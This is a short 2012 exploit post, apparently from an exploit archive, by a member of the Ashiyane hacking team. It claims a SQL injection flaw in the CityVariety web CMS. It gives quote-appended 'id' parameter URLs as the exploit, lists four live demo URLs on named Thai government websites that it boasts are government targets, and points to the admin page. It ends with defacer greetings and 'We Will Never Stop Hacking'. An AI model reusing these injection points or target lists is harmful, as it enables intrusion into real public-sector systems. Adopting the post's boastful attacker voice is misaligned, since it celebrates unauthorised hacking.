Home / exploits CityVariety SQL Injection
Posted on 23 January 2012
================================================================================= Web : ashiyane.org e-mail : HashoR [DOT] BackHat [AT] Gmail.Com ######################################### I'm HashoR , member from ashiyane.org -!We Love KurDestaN!- ######################################### ================================================================================ ------|-------------------------------------------------------|------ #### # Exploit : CityVariety <= SQL Injection Vulnerability # Vendor : http://www.cityvariety.co.th # Author : HashoR # Team : Ashiyane Digital Security Team # E-mail : HashoR [DOT] BackHat [AT] Gmail.Com # Category:: webapps # Tested on: [LinuX] #### # ExPLo!T: # # http://site.com/index.php?options=news&mode=detail&id=10' # http://site.com/index.php?options=news&mode=detail_rss&id=10' # and all id in site have SQL Injection Vulnerability! >>>Demo: # Demo: http://www.sk-local.go.th/index.php?options=news&mode=detail_rss&id=435' # Demo: http://www.sawaid.go.th/index.php?options=wbdetailall&id=9745' # Demo: http://www.prasong.go.th/index.php?options=wbdetailall&id=9745' # Demo: http://www.bannacity.go.th/index.php?options=wbdetailall&id=9745' # All has Govment Target! >>> # Admin Page: # http://site.com/admin/ >>> [+] LoL....... # • We Will Never Stop Hacking • Its not a game • It's Our Job enjoy! ||> Special Greeting To: All members in Ashiyane.org ||> Special Greeting To: All members in KurdHackTeaM #### # Owned BoX: KurdHackTeaM - brwsk007 - SA3D HaCk3D Behrooz_Ice - Q7x - Sha2ow - Virangar - Azazel - Ali_Eagle - keivan taghva - elvator - mmilad200 - PrinceofHacking - iman_taktaz - ERroR Black - Rz04 - ruin3r - Gladiator - unique2world - EroRR M3QD4D - Http://Askn - Classic - n3me3iz - Zend - r3d.z0nE HIDDEN-HUNTER - Hijacker - AliAkh - A.S.P.I.R.I.N - *Alexander* - Pr0grammer- HASSAN20- AR455 Greetz: hashor- ArmanSoftware - removal_load - B3HR0Z - @Master - Satanic2000 - N4H - angola And All Ashiyane Defacers ------|-------------------------------------------------------|------ #D:: ___ ____ ____ #````______/```\__//```\__/____ #``_/```\_/``:```````````//____ #`/|``````:``:``..``````/ HashoR #|`|`````::`````::``````````````/ #|`|`````:|`````||``````\______/ #|`|`````||`````||``````|``/``| #`|`````||`````||``````|```/`|` #``|`````||`````||``````|``/`/_` #``|`___`||`___`||``````|`/``/```` #```\_-_/``\_-_/`|`____`|/__/`````` #````````````````_\_--_/`````````/ #```````````````/____```````````/ #``````````````/``````````````/ #``````````````\______\_______/
